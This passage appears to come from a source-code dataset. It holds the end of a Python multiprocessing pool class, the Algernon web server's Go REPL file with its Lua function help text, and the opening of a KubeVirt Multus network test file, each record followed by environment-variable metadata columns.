self.pool = mp.Pool(processes=self.number_of_processes, maxtasksperchild=None,
initializer=_initializer, initargs=initargs)
logger.info('Multiprocess pool started using start method "' + mp.get_sharing_strategy() + '"' +
' in: ' + str(time.perf_counter()-start) + ' seconds')
if torch.cuda.is_available() and self.number_of_processes > torch.cuda.device_count():
logger.warning("You are trying to run more processes than there are available GPUs, "
"it is advised to run `nvidia-cuda-mps-control` to leverage concurrent cuda executions. "
"If run in background mode, don't forget to stop the daemon when done.")
def _cleanup_multiprocess_pool(self):
if self.pool is not None:
self.pool.terminate()
####################################################################################################################
### Common methods, not necessarily useful for every model.
####################################################################################################################
def cleanup(self):
self._cleanup_multiprocess_pool()
def clear_memory(self):
pass
| []
| []
| [
"OMP_NUM_THREADS"
]
| [] | ["OMP_NUM_THREADS"] | python | 1 | 0 | |
engine/repl.go | package engine
import (
"bytes"
"fmt"
"io"
"os"
"path/filepath"
"runtime"
"strings"
"github.com/chzyer/readline"
"github.com/mitchellh/go-homedir"
log "github.com/sirupsen/logrus"
"github.com/xyproto/algernon/lua/codelib"
"github.com/xyproto/algernon/lua/convert"
"github.com/xyproto/algernon/lua/datastruct"
"github.com/xyproto/algernon/lua/jnode"
"github.com/xyproto/algernon/lua/pure"
"github.com/xyproto/ask"
"github.com/xyproto/gopher-lua"
"github.com/xyproto/textoutput"
)
const (
generalHelpText = `Available functions:
Data structures
// Get or create database-backed Set (takes a name, returns a set object)
Set(string) -> userdata
// Add an element to the set
set:add(string)
// Remove an element from the set
set:del(string)
// Check if a set contains a value.
// Returns true only if the value exists and there were no errors.
set:has(string) -> bool
// Get all members of the set
set:getall() -> table
// Remove the set itself. Returns true if successful.
set:remove() -> bool
// Clear the set. Returns true if successful.
set:clear() -> bool
// Get or create a database-backed List (takes a name, returns a list object)
List(string) -> userdata
// Add an element to the list
list:add(string)
// Get all members of the list
list:getall() -> table
// Get the last element of the list. The returned value can be empty
list:getlast() -> string
// Get the N last elements of the list
list:getlastn(number) -> table
// Remove the list itself. Returns true if successful.
list:remove() -> bool
// Clear the list. Returns true if successful.
list:clear() -> bool
// Return all list elements (expected to be JSON strings) as a JSON list
list:json() -> string
// Get or create a database-backed HashMap
// (takes a name, returns a hash map object)
HashMap(string) -> userdata
// For a given element id (for instance a user id), set a key.
// Returns true if successful.
hash:set(string, string, string) -> bool
// For a given element id (for instance a user id), and a key, return a value.
hash:get(string, string) -> string
// For a given element id (for instance a user id), and a key,
// check if the key exists in the hash map.
hash:has(string, string) -> bool
// For a given element id (for instance a user id), check if it exists.
hash:exists(string) -> bool
// Get all keys of the hash map
hash:getall() -> table
// Remove a key for an entry in a hash map. Returns true if successful
hash:delkey(string, string) -> bool
// Remove an element (for instance a user). Returns true if successful
hash:del(string) -> bool
// Remove the hash map itself. Returns true if successful.
hash:remove() -> bool
// Clear the hash map. Returns true if successful.
hash:clear() -> bool
// Get or create a database-backed KeyValue collection
// (takes a name, returns a key/value object)
KeyValue(string) -> userdata
// Set a key and value. Returns true if successful.
kv:set(string, string) -> bool
// Takes a key, returns a value. May return an empty string.
kv:get(string) -> string
// Takes a key, returns the value+1.
// Creates a key/value and returns "1" if it did not already exist.
kv:inc(string) -> string
// Remove a key. Returns true if successful.
kv:del(string) -> bool
// Remove the KeyValue itself. Returns true if successful.
kv:remove() -> bool
// Clear the KeyValue. Returns true if successful.
kv:clear() -> bool
Live server configuration
// Reset the URL prefixes and make everything *public*.
ClearPermissions()
// Add an URL prefix that will have *admin* rights.
AddAdminPrefix(string)
// Add an URL prefix that will have *user* rights.
AddUserPrefix(string)
// Provide a lua function that will be used as the permission denied handler.
DenyHandler(function)
// Direct the logging to the given filename. If the filename is an empty
// string, direct logging to stderr. Returns true if successful.
LogTo(string) -> bool
Output
// Log the given strings as info. Takes a variable number of strings.
log(...)
// Log the given strings as a warning. Takes a variable number of strings.
warn(...)
// Log the given strings as an error. Takes a variable number of strings.
err(...)
// Output text. Takes a variable number of strings.
print(...)
// Output rendered HTML given Markdown. Takes a variable number of strings.
mprint(...)
// Output rendered HTML given Amber. Takes a variable number of strings.
aprint(...)
// Output rendered CSS given GCSS. Takes a variable number of strings.
gprint(...)
// Output rendered JavaScript given JSX for HyperApp. Takes a variable number of strings.
hprint(...)
// Output rendered JavaScript given JSX for React. Takes a variable number of strings.
jprint(...)
// Output a Pongo2 template and key/value table as rendered HTML. Use "{{ key }}" to insert a key.
poprint(string[, table])
// Output a simple HTML page with a message, title and theme.
msgpage(string[, string][, string])
Cache
CacheInfo() -> string // Return information about the file cache.
ClearCache() // Clear the file cache.
preload(string) -> bool // Load a file into the cache, returns true on success.
JSON
// Use, or create, a JSON document/file.
JFile(filename) -> userdata
// Retrieve a string, given a valid JSON path. May return an empty string.
jfile:getstring(string) -> string
// Retrieve a JSON node, given a valid JSON path. May return nil.
jfile:getnode(string) -> userdata
// Retrieve a value, given a valid JSON path. May return nil.
jfile:get(string) -> value
// Change an entry given a JSON path and a value. Returns true if successful.
jfile:set(string, string) -> bool
// Given a JSON path (optional) and JSON data, add it to a JSON list.
// Returns true if successful.
jfile:add([string, ]string) -> bool
// Removes a key in a map in a JSON document. Returns true if successful.
jfile:delkey(string) -> bool
// Convert a Lua table with strings or ints to JSON.
// Takes an optional number of spaces to indent the JSON data.
json(table[, number]) -> string
// Create a JSON document node.
JNode() -> userdata
// Add JSON data to a node. The first argument is an optional JSON path.
// The second argument is a JSON data string. Returns true on success.
// "x" is the default JSON path.
jnode:add([string, ]string) ->
// Given a JSON path, retrieves a JSON node.
jnode:get(string) -> userdata
// Given a JSON path, retrieves a JSON string.
jnode:getstring(string) -> string
// Given a JSON path and a JSON string, set the value.
jnode:set(string, string)
// Given a JSON path, remove a key from a map.
jnode:delkey(string) -> bool
// Return the JSON data, nicely formatted.
jnode:pretty() -> string
// Return the JSON data, as a compact string.
jnode:compact() -> string
// Sends JSON data to the given URL. Returns the HTTP status code as a string.
// The content type is set to "application/json;charset=utf-8".
// The second argument is an optional authentication token that is used for the
// Authorization header field. Uses HTTP POST.
jnode:POST(string[, string]) -> string
// Sends JSON data to the given URL. Returns the HTTP status code as a string.
// The content type is set to "application/json;charset=utf-8".
// The second argument is an optional authentication token that is used for the
// Authorization header field. Uses HTTP PUT.
jnode:PUT(string[, string]) -> string
// Alias for jnode:POST
jnode:send(string[, string]) -> string
// Fetches JSON over HTTP given an URL that starts with http or https.
// The JSON data is placed in the JNode. Returns the HTTP status code as a string.
jnode:GET(string) -> string
// Alias for jnode:GET
jnode:receive(string) -> string
// Convert from a simple Lua table to a JSON string
JSON(table) -> string
HTTP Requests
// Create a new HTTP Client object
HTTPClient() -> userdata
// Select Accept-Language (ie. "en-us")
hc:SetLanguage(string)
// Set the request timeout (in milliseconds)
hc:SetTimeout(number)
// Set a cookie (name and value)
hc:SetCookie(string, string)
// Set the user agent (ie. "curl")
hc:SetUserAgent(string)
// Perform a HTTP GET request. First comes the URL, then an optional table with
// URL paramets, then an optional table with HTTP headers.
hc:Get(string, [table], [table]) -> string
// Perform a HTTP POST request. It's the same arguments as for hc:Get, except
// the fourth optional argument is the POST body.
hc:Post(string, [table], [table], [string]) -> string
// Like hc:Get, except the first argument is the HTTP method (like "PUT")
hc:Do(string, string, [table], [table]) -> string
// Shorthand for HTTPClient():Get(). Retrieve an URL, with optional tables for
// URL parameters and HTTP headers.
GET(string, [table], [table]) -> string
// Shorthand for HTTPClient():Post(). Post to an URL, with optional tables for
// URL parameters and HTTP headers, followed by a string for the body.
POST(string, [table], [table], [string]) -> string
// Shorthand for HTTPClient():Do(). Like Get, but the first argument is the
// method, like ie. "PUT".
DO(string, string, [table], [table]) -> string
Plugins
// Load a plugin given the path to an executable. Returns true if successful.
// Will return the plugin help text if called on the Lua prompt.
Plugin(string) -> bool
// Returns the Lua code as returned by the Lua.Code function in the plugin,
// given a plugin path. May return an empty string.
PluginCode(string) -> string
// Takes a plugin path, function name and arguments. Returns an empty string
// if the function call fails, or the results as a JSON string if successful.
CallPlugin(string, string, ...) -> string
Code libraries
// Create or use a code library object. Takes an optional data structure name.
CodeLib([string]) -> userdata
// Given a namespace and Lua code, add the given code to the namespace.
// Returns true if successful.
codelib:add(string, string) -> bool
// Given a namespace and Lua code, set the given code as the only code
// in the namespace. Returns true if successful.
codelib:set(string, string) -> bool
// Given a namespace, return Lua code, or an empty string.
codelib:get(string) -> string
// Import (eval) code from the given namespace into the current Lua state.
// Returns true if successful.
codelib:import(string) -> bool
// Completely clear the code library. Returns true if successful.
codelib:clear() -> bool
Various
// Return a string with various server information
ServerInfo() -> string
// Return the version string for the server
version() -> string
// Tries to extract and print the contents of the given Lua values
pprint(...)
// Sleep the given number of seconds (can be a float)
sleep(number)
// Return the number of nanoseconds from 1970 ("Unix time")
unixnano() -> number
// Convert Markdown to HTML
markdown(string) -> string
// Query a PostgreSQL database with a query and a connection string.
// Default connection string: "host=localhost port=5432 user=postgres dbname=test sslmode=disable"
PQ([string], [string]) -> table
// Query a MSSQL database with a query and a connection string.
// Default connection string: "server=localhost;user=user;password=password,port=1433"
MSSQL([string], [string]) -> table
REPL-only
// Output the current working directory
cwd | pwd
// Output the current file or directory that is being served
serverdir | serverfile
// Exit Algernon
exit | halt | quit | shutdown
Extra
// Takes a Python filename, executes the script with the "python" binary in the Path.
// Returns the output as a Lua table, where each line is an entry.
py(string) -> table
// Takes one or more system commands (possibly separated by ";") and runs them.
// Returns the output lines as a table.
run(string) -> table
// Lists the keys and values of a Lua table. Returns a string.
// Lists the contents of the global namespace "_G" if no arguments are given.
dir([table]) -> string
`
usageMessage = `
Type "webhelp" for an overview of functions that are available when
handling requests. Or "confighelp" for an overview of functions that are
available when configuring an Algernon application.
`
webHelpText = `Available functions:
Handling users and permissions
// Check if the current user has "user" rights
UserRights() -> bool
// Check if the given username exists (does not check unconfirmed users)
HasUser(string) -> bool
// Check if the given username exists in the list of unconfirmed users
HasUnconfirmedUser(string) -> bool
// Get the value from the given boolean field
// Takes a username and field name
BooleanField(string, string) -> bool
// Save a value as a boolean field
// Takes a username, field name and boolean value
SetBooleanField(string, string, bool)
// Check if a given username is confirmed
IsConfirmed(string) -> bool
// Check if a given username is logged in
IsLoggedIn(string) -> bool
// Check if the current user has "admin rights"
AdminRights() -> bool
// Check if a given username is an admin
IsAdmin(string) -> bool
// Get the username stored in a cookie, or an empty string
UsernameCookie() -> string
// Store the username in a cookie, returns true if successful
SetUsernameCookie(string) -> bool
// Clear the login cookie
ClearCookie()
// Get a table containing all usernames
AllUsernames() -> table
// Get the email for a given username, or an empty string
Email(string) -> string
// Get the password hash for a given username, or an empty string
PasswordHash(string) -> string
// Get all unconfirmed usernames
AllUnconfirmedUsernames() -> table
// Get the existing confirmation code for a given user,
// or an empty string. Takes a username.
ConfirmationCode(string) -> string
// Add a user to the list of unconfirmed users.
// Takes a username and a confirmation code.
// Remember to also add a user, when registering new users.
AddUnconfirmed(string, string)
// Remove a user from the list of unconfirmed users. Takes a username.
RemoveUnconfirmed(string)
// Mark a user as confirmed. Takes a username.
MarkConfirmed(string)
// Removes a user. Takes a username.
RemoveUser(string)
// Make a user an admin. Takes a username.
SetAdminStatus(string)
// Make an admin user a regular user. Takes a username.
RemoveAdminStatus(string)
// Add a user. Takes a username, password and email.
AddUser(string, string, string)
// Set a user as logged in on the server (not cookie). Takes a username.
SetLoggedIn(string)
// Set a user as logged out on the server (not cookie). Takes a username.
SetLoggedOut(string)
// Log in a user, both on the server and with a cookie. Takes a username.
Login(string)
// Log out a user, on the server (which is enough). Takes a username.
Logout(string)
// Get the current username, from the cookie
Username() -> string
// Get the current cookie timeout. Takes a username.
CookieTimeout(string) -> number
// Set the current cookie timeout. Takes a timeout, in seconds.
SetCookieTimeout(number)
// Get the current server-wide cookie secret, for persistent logins
CookieSecret() -> string
// Set the current server-side cookie secret, for persistent logins
SetCookieSecret(string)
// Get the current password hashing algorithm (bcrypt, bcrypt+ or sha256)
PasswordAlgo() -> string
// Set the current password hashing algorithm (bcrypt, bcrypt+ or sha256)
// Takes a string
SetPasswordAlgo(string)
// Hash the password
// Takes a username and password (username can be used for salting)
HashPassword(string, string) -> string
// Change the password for a user, given a username and a new password
SetPassword(string, string)
// Check if a given username and password is correct
// Takes a username and password
CorrectPassword(string, string) -> bool
// Checks if a confirmation code is already in use
// Takes a confirmation code
AlreadyHasConfirmationCode(string) -> bool
// Find a username based on a given confirmation code,
// or returns an empty string. Takes a confirmation code
FindUserByConfirmationCode(string) -> string
// Mark a user as confirmed
// Takes a username
Confirm(string)
// Mark a user as confirmed, returns true if successful
// Takes a confirmation code
ConfirmUserByConfirmationCode(string) -> bool
// Set the minimum confirmation code length
// Takes the minimum number of characters
SetMinimumConfirmationCodeLength(number)
// Generates a unique confirmation code, or an empty string
GenerateUniqueConfirmationCode() -> string
File uploads
// Creates a file upload object. Takes a form ID (from a POST request) as the
// first parameter. Takes an optional maximum upload size (in MiB) as the
// second parameter. Returns nil and an error string on failure, or userdata
// and an empty string on success.
UploadedFile(string[, number]) -> userdata, string
// Return the uploaded filename, as specified by the client
uploadedfile:filename() -> string
// Return the size of the data that has been received
uploadedfile:size() -> number
// Return the mime type of the uploaded file, as specified by the client
uploadedfile:mimetype() -> string
// Return the full textual content of the uploaded file
uploadedfile:content() -> string
// Save the uploaded data locally. Takes an optional filename.
uploadedfile:save([string]) -> bool
// Save the uploaded data as the client-provided filename, in the specified
// directory. Takes a relative or absolute path. Returns true on success.
uploadedfile:savein(string) -> bool
Handling requests
// Set the Content-Type for a page.
content(string)
// Return the requested HTTP method (GET, POST etc).
method() -> string
// Output text to the browser/client. Takes a variable number of strings.
print(...)
// Return the requested URL path.
urlpath() -> string
// Return the HTTP header in the request, for a given key, or an empty string.
header(string) -> string
// Set an HTTP header given a key and a value.
setheader(string, string)
// Return the HTTP headers, as a table.
headers() -> table
// Return the HTTP body in the request
// (will only read the body once, since it's streamed).
body() -> string
// Set a HTTP status code (like 200 or 404).
// Must be used before other functions that writes to the client!
status(number)
// Set a HTTP status code and output a message (optional).
error(number[, string])
// Return the directory where the script is running. If a filename (optional)
// is given, then the path to where the script is running, joined with a path
// separator and the given filename, is returned.
scriptdir([string]) -> string
// Return the directory where the server is running. If a filename (optional)
// is given, then the path to where the server is running, joined with a path
// separator and the given filename, is returned.
serverdir([string]) -> string
// Serve a file that exists in the same directory as the script.
serve(string)
// Serve a Pongo2 template file, with an optional table with key/values.
serve2(string[, table)
// Return the rendered contents of a file that exists in the same directory
// as the script. Takes a filename.
render(string) -> string
// Return a table with keys and values as given in a posted form, or as given
// in the URL ("/some/page?x=7" makes "x" with the value "7" available).
formdata() -> table
// Redirect to an absolute or relative URL. Also takes a HTTP status code.
redirect(string[, number])
// Permanently redirect to an absolute or relative URL. Uses status code 302.
permanent_redirect(string)
// Transmit what has been outputted so far, to the client.
flush()
`
configHelpText = `Available functions:
Only available when used in serverconf.lua
// Set the default address for the server on the form [host][:port].
SetAddr(string)
// Reset the URL prefixes and make everything *public*.
ClearPermissions()
// Add an URL prefix that will have *admin* rights.
AddAdminPrefix(string)
// Add an URL prefix that will have *user* rights.
AddUserPrefix(string)
// Provide a lua function that will be used as the permission denied handler.
DenyHandler(function)
// Provide a lua function that will be run once,
// when the server is ready to start serving.
OnReady(function)
// Use a Lua file for setting up HTTP handlers instead of using the directory structure.
ServerFile(string) -> bool
// Get the cookie secret from the server configuration.
CookieSecret() -> string
// Set the cookie secret that will be used when setting and getting browser cookies.
SetCookieSecret(string)
`
exitMessage = "bye"
)
// Export Lua functions specific to the REPL
func exportREPLSpecific(L *lua.LState) {
// Attempt to return a more informative text than the memory location.
// Can take several arguments, just like print().
L.SetGlobal("pprint", L.NewFunction(func(L *lua.LState) int {
var buf bytes.Buffer
top := L.GetTop()
for i := 1; i <= top; i++ {
convert.PprintToWriter(&buf, L.Get(i))
if i != top {
buf.WriteString("\t")
}
}
// Output the combined text
fmt.Println(buf.String())
return 0 // number of results
}))
// Get the current directory since this is probably in the REPL
L.SetGlobal("scriptdir", L.NewFunction(func(L *lua.LState) int {
scriptpath, err := os.Getwd()
if err != nil {
log.Error(err)
L.Push(lua.LString("."))
return 1 // number of results
}
top := L.GetTop()
if top == 1 {
// Also include a separator and a filename
fn := L.ToString(1)
scriptpath = filepath.Join(scriptpath, fn)
}
// Now have the correct absolute scriptpath
L.Push(lua.LString(scriptpath))
return 1 // number of results
}))
}
// Split the given line in three parts, and color the parts
func colorSplit(line, sep string, colorFunc1, colorFuncSep, colorFunc2 func(string) string, reverse bool) (string, string) {
if strings.Contains(line, sep) {
fields := strings.SplitN(line, sep, 2)
s1 := ""
if colorFunc1 != nil {
s1 += colorFunc1(fields[0])
} else {
s1 += fields[0]
}
s2 := ""
if colorFunc2 != nil {
s2 += colorFuncSep(sep) + colorFunc2(fields[1])
} else {
s2 += sep + fields[1]
}
return s1, s2
}
if reverse {
return "", line
}
return line, ""
}
// Syntax highlight the given line
func highlight(o *textoutput.TextOutput, line string) string {
unprocessed := line
unprocessed, comment := colorSplit(unprocessed, "//", nil, o.DarkGray, o.DarkGray, false)
module, unprocessed := colorSplit(unprocessed, ":", o.LightGreen, o.DarkRed, nil, true)
function := ""
if unprocessed != "" {
// Green function names
if strings.Contains(unprocessed, "(") {
fields := strings.SplitN(unprocessed, "(", 2)
function = o.LightGreen(fields[0])
unprocessed = "(" + fields[1]
} else if strings.Contains(unprocessed, "|") {
unprocessed = "<magenta>" + strings.ReplaceAll(unprocessed, "|", "<white>|</white><magenta>") + "</magenta>"
}
}
unprocessed, typed := colorSplit(unprocessed, "->", nil, o.LightBlue, o.DarkRed, false)
unprocessed = strings.ReplaceAll(unprocessed, "string", o.LightBlue("string"))
unprocessed = strings.ReplaceAll(unprocessed, "number", o.LightYellow("number"))
unprocessed = strings.ReplaceAll(unprocessed, "function", o.LightCyan("function"))
return module + function + unprocessed + typed + comment
}
// Output syntax highlighted help text, with an additional usage message
func outputHelp(o *textoutput.TextOutput, helpText string) {
for _, line := range strings.Split(helpText, "\n") {
o.Println(highlight(o, line))
}
o.Println(usageMessage)
}
// Output syntax highlighted help about a specific topic or function
func outputHelpAbout(o *textoutput.TextOutput, helpText, topic string) {
switch topic {
case "help":
o.Println(o.DarkGray("Output general help or help about a specific topic."))
return
case "webhelp":
o.Println(o.DarkGray("Output help about web-related functions."))
return
case "confighelp":
o.Println(o.DarkGray("Output help about configuration-related functions."))
return
case "quit", "exit", "shutdown", "halt":
o.Println(o.DarkGray("Quit Algernon."))
return
}
comment := ""
for _, line := range strings.Split(helpText, "\n") {
if strings.HasPrefix(line, topic) {
// Output help text, with some surrounding blank lines
o.Println("\n" + highlight(o, line))
o.Println("\n" + o.DarkGray(strings.TrimSpace(comment)) + "\n")
return
}
// Gather comments until a non-comment is encountered
if strings.HasPrefix(line, "//") {
comment += strings.TrimSpace(line[2:]) + "\n"
} else {
comment = ""
}
}
o.Println(o.DarkGray("Found no help for: ") + o.White(topic))
}
// Take all functions mentioned in the given help text string and add them to the readline completer
func addFunctionsFromHelptextToCompleter(helpText string, completer *readline.PrefixCompleter) {
for _, line := range strings.Split(helpText, "\n") {
if !strings.HasPrefix(line, "//") && strings.Contains(line, "(") {
parts := strings.Split(line, "(")
if strings.Contains(line, "()") {
completer.Children = append(completer.Children, &readline.PrefixCompleter{Name: []rune(parts[0] + "()")})
} else {
completer.Children = append(completer.Children, &readline.PrefixCompleter{Name: []rune(parts[0] + "(")})
}
}
}
}
// LoadLuaFunctionsForREPL exports the various Lua functions that might be needed in the REPL
func (ac *Config) LoadLuaFunctionsForREPL(L *lua.LState, o *textoutput.TextOutput) {
// Server configuration functions
ac.LoadServerConfigFunctions(L, "")
// Other basic system functions, like log()
ac.LoadBasicSystemFunctions(L)
// If there is a database backend
if ac.perm != nil {
// Retrieve the creator struct
creator := ac.perm.UserState().Creator()
// Simpleredis data structures
datastruct.LoadList(L, creator)
datastruct.LoadSet(L, creator)
datastruct.LoadHash(L, creator)
datastruct.LoadKeyValue(L, creator)
// For saving and loading Lua functions
codelib.Load(L, creator)
}
// For handling JSON data
jnode.LoadJSONFunctions(L)
ac.LoadJFile(L, ac.serverDirOrFilename)
jnode.Load(L)
// Extras
pure.Load(L)
// Export pprint and scriptdir
exportREPLSpecific(L)
// Plugin functionality
ac.LoadPluginFunctions(L, o)
// Cache
ac.LoadCacheFunctions(L)
}
// REPL provides a "Read Eval Print" loop for interacting with Lua.
// A variety of functions are exposed to the Lua state.
func (ac *Config) REPL(ready, done chan bool) error {
var (
historyFilename string
err error
)
historydir, err := homedir.Dir()
if err != nil {
log.Error("Could not find a user directory to store the REPL history.")
historydir = "."
}
// Retrieve a Lua state
L := ac.luapool.Get()
// Don't re-use the Lua state
defer L.Close()
// Colors and input
windows := (runtime.GOOS == "windows")
mingw := windows && strings.HasPrefix(os.Getenv("TERM"), "xterm")
enableColors := !windows || mingw
o := textoutput.NewTextOutput(enableColors, true)
// Command history file
if windows {
historyFilename = filepath.Join(historydir, "algernon_history.txt")
} else {
historyFilename = filepath.Join(historydir, ".algernon_history")
}
// Export a selection of functions to the Lua state
ac.LoadLuaFunctionsForREPL(L, o)
<-ready // Wait for the server to be ready
// Tell the user that the server is ready
o.Println(o.LightGreen("Ready"))
// Start the read, eval, print loop
var (
line string
prompt = o.LightCyan("lua> ")
EOF bool
EOFcount int
)
// TODO: Automatically generate a list of all words that should be completed
// based on the documentation or repl help text. Then add each word
// to the completer.
completer := readline.NewPrefixCompleter(
&readline.PrefixCompleter{Name: []rune("bye")},
&readline.PrefixCompleter{Name: []rune("confighelp")},
&readline.PrefixCompleter{Name: []rune("cwd")},
&readline.PrefixCompleter{Name: []rune("dir")},
&readline.PrefixCompleter{Name: []rune("exit")},
&readline.PrefixCompleter{Name: []rune("help")},
&readline.PrefixCompleter{Name: []rune("pwd")},
&readline.PrefixCompleter{Name: []rune("quit")},
&readline.PrefixCompleter{Name: []rune("serverdir")},
&readline.PrefixCompleter{Name: []rune("serverfile")},
&readline.PrefixCompleter{Name: []rune("webhelp")},
&readline.PrefixCompleter{Name: []rune("zalgo")},
)
addFunctionsFromHelptextToCompleter(generalHelpText, completer)
l, err := readline.NewEx(&readline.Config{
Prompt: prompt,
HistoryFile: historyFilename,
AutoComplete: completer,
InterruptPrompt: "^C",
EOFPrompt: "exit",
HistorySearchFold: true,
})
if err != nil {
log.Error("Could not initiate github.com/chzyer/readline: " + err.Error())
}
// To be run at server shutdown
AtShutdown(func() {
// Verbose mode has different log output at shutdown
if !ac.verboseMode {
o.Println(o.LightBlue(exitMessage))
}
})
for {
// Retrieve user input
EOF = false
if mingw {
// No support for EOF
line = ask.Ask(prompt)
} else {
if line, err = l.Readline(); err != nil {
switch {
case err == io.EOF:
if ac.debugMode {
o.Println(o.LightPurple(err.Error()))
}
EOF = true
case err == readline.ErrInterrupt:
log.Warn("Interrupted")
done <- true
return nil
default:
log.Error("Error reading line(" + err.Error() + ").")
continue
}
}
}
if EOF {
if ac.ctrldTwice {
switch EOFcount {
case 0:
o.Err("Press ctrl-d again to exit.")
EOFcount++
continue
default:
done <- true
return nil
}
} else {
done <- true
return nil
}
}
line = strings.TrimSpace(line)
if line == "" {
continue
}
switch line {
case "help":
outputHelp(o, generalHelpText)
continue
case "webhelp":
outputHelp(o, webHelpText)
continue
case "confighelp":
outputHelp(o, configHelpText)
continue
case "dir":
// Be more helpful than listing the Lua bytecode contents of the dir function. Call "dir()".
line = "dir()"
case "cwd", "pwd":
if cwd, err := os.Getwd(); err != nil {
// Might work if Getwd should fail. Should work on Windows, Linux and macOS
line = "os.getenv'CD' or os.getenv'PWD'"
} else {
fmt.Println(cwd)
continue
}
case "serverfile", "serverdir":
if absdir, err := filepath.Abs(ac.serverDirOrFilename); err != nil {
fmt.Println(ac.serverDirOrFilename)
} else {
fmt.Println(absdir)
}
continue
case "quit", "exit", "shutdown", "halt":
done <- true
return nil
case "zalgo":
// Easter egg
o.ErrExit("Ḫ̷̲̫̰̯̭̀̂̑~ͅĚ̥̖̩̘̱͔͈͈ͬ̚ ̦̦͖̲̀ͦ͂C̜͓̲̹͐̔ͭ̏Oͭ͛͂̋ͭͬͬ͆͏̺͓̰͚͠ͅM̢͉̼̖͍̊̕Ḛ̭̭͗̉̀̆ͬ̐ͪ̒S͉̪͂͌̄")
default:
topic := ""
if len(line) > 5 && (strings.HasPrefix(line, "help(") || strings.HasPrefix(line, "help ")) {
topic = line[5:]
} else if len(line) > 8 && (strings.HasPrefix(line, "webhelp(") || strings.HasPrefix(line, "webhelp ")) {
topic = line[8:]
}
if len(topic) > 0 {
topic = strings.TrimSuffix(topic, ")")
outputHelpAbout(o, generalHelpText+webHelpText+configHelpText, topic)
continue
}
}
// If the line starts with print, don't touch it
if strings.HasPrefix(line, "print(") {
if err = L.DoString(line); err != nil {
// Output the error message
o.Err(err.Error())
}
} else {
// Wrap the line in "pprint"
if err = L.DoString("pprint(" + line + ")"); err != nil {
// If there was a syntax error, try again without pprint
if strings.Contains(err.Error(), "syntax error") {
if err = L.DoString(line); err != nil {
// Output the error message
o.Err(err.Error())
}
// For other kinds of errors, output the error
} else {
// Output the error message
o.Err(err.Error())
}
}
}
}
}
| [
"\"TERM\""
]
| []
| [
"TERM"
]
| [] | ["TERM"] | go | 1 | 0 | |
tests/network/vmi_multus.go | /*
* This file is part of the kubevirt project
*
* Licensed under the Apache License, Version 2.0 (the "License");
* you may not use this file except in compliance with the License.
* You may obtain a copy of the License at
*
* http://www.apache.org/licenses/LICENSE-2.0
*
* Unless required by applicable law or agreed to in writing, software
* distributed under the License is distributed on an "AS IS" BASIS,
* WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
* See the License for the specific language governing permissions and
* limitations under the License.
*
* Copyright 2018 Red Hat, Inc.
*
*/
package network
import (
"context"
"fmt"
"net"
"os"
"strings"
"time"
expect "github.com/google/goexpect"
. "github.com/onsi/ginkgo"
. "github.com/onsi/gomega"
appsv1 "k8s.io/api/apps/v1"
k8sv1 "k8s.io/api/core/v1"
"k8s.io/apimachinery/pkg/api/errors"
"k8s.io/apimachinery/pkg/api/resource"
metav1 "k8s.io/apimachinery/pkg/apis/meta/v1"
v13 "k8s.io/apimachinery/pkg/apis/meta/v1"
"k8s.io/apimachinery/pkg/util/wait"
"k8s.io/utils/pointer"
virtconfig "kubevirt.io/kubevirt/pkg/virt-config"
"kubevirt.io/kubevirt/pkg/virt-controller/services"
"kubevirt.io/kubevirt/pkg/virt-launcher/virtwrap/api"
v1 "kubevirt.io/client-go/api/v1"
"kubevirt.io/client-go/kubecli"
"kubevirt.io/kubevirt/tests"
"kubevirt.io/kubevirt/tests/console"
cd "kubevirt.io/kubevirt/tests/containerdisk"
"kubevirt.io/kubevirt/tests/flags"
"kubevirt.io/kubevirt/tests/libnet"
"kubevirt.io/kubevirt/tests/libvmi"
)
const (
postUrl = "/apis/k8s.cni.cncf.io/v1/namespaces/%s/network-attachment-definitions/%s"
linuxBridgeConfCRD = `{"apiVersion":"k8s.cni.cncf.io/v1","kind":"NetworkAttachmentDefinition","metadata":{"name":"%s","namespace":"%s"},"spec":{"config":"{ \"cniVersion\": \"0.3.1\", \"name\": \"mynet\", \"plugins\": [{\"type\": \"bridge\", \"bridge\": \"br10\", \"vlan\": 100, \"ipam\": {}},{\"type\": \"tuning\"}]}"}}`
ptpConfCRD = `{"apiVersion":"k8s.cni.cncf.io/v1","kind":"NetworkAttachmentDefinition","metadata":{"name":"%s","namespace":"%s"},"spec":{"config":"{ \"cniVersion\": \"0.3.1\", \"name\": \"mynet\", \"plugins\": [{\"type\": \"ptp\", \"ipam\": { \"type\": \"host-local\", \"subnet\": \"%s\" }},{\"type\": \"tuning\"}]}"}}`
sriovConfCRD = `{"apiVersion":"k8s.cni.cncf.io/v1","kind":"NetworkAttachmentDefinition","metadata":{"name":"%s","namespace":"%s","annotations":{"k8s.v1.cni.cncf.io/resourceName":"%s"}},"spec":{"config":"{ \"cniVersion\": \"0.3.1\", \"name\": \"sriov\", \"type\": \"sriov\", \"vlan\": 0, \"ipam\": { \"type\": \"host-local\", \"subnet\": \"10.1.1.0/24\" } }"}}`
sriovLinkEnableConfCRD = `{"apiVersion":"k8s.cni.cncf.io/v1","kind":"NetworkAttachmentDefinition","metadata":{"name":"%s","namespace":"%s","annotations":{"k8s.v1.cni.cncf.io/resourceName":"%s"}},"spec":{"config":"{ \"cniVersion\": \"0.3.1\", \"name\": \"sriov\", \"type\": \"sriov\", \"link_state\": \"enable\", \"vlan\": 0, \"ipam\": { \"type\": \"host-local\", \"subnet\": \"10.1.1.0/24\" } }"}}`
macvtapNetworkConf = `{"apiVersion":"k8s.cni.cncf.io/v1","kind":"NetworkAttachmentDefinition","metadata":{"name":"%s","namespace":"%s", "annotations": {"k8s.v1.cni.cncf.io/resourceName": "macvtap.network.kubevirt.io/%s"}},"spec":{"config":"{ \"cniVersion\": \"0.3.1\", \"name\": \"%s\", \"type\": \"macvtap\"}"}}`
sriovConfVlanCRD = `{"apiVersion":"k8s.cni.cncf.io/v1","kind":"NetworkAttachmentDefinition","metadata":{"name":"%s","namespace":"%s","annotations":{"k8s.v1.cni.cncf.io/resourceName":"%s"}},"spec":{"config":"{ \"cniVersion\": \"0.3.1\", \"name\": \"sriov\", \"type\": \"sriov\", \"link_state\": \"enable\", \"vlan\": 200, \"ipam\":{}}"}}`
)
const (
sriovnet1 = "sriov"
sriovnet2 = "sriov2"
sriovnet3 = "sriov3"
)
const ptpSubnet = "10.1.1.0/24"
var _ = SIGDescribe("[Serial]Multus", func() {
var err error
var virtClient kubecli.KubevirtClient
var nodes *k8sv1.NodeList
defaultInterface := v1.Interface{
Name: "default",
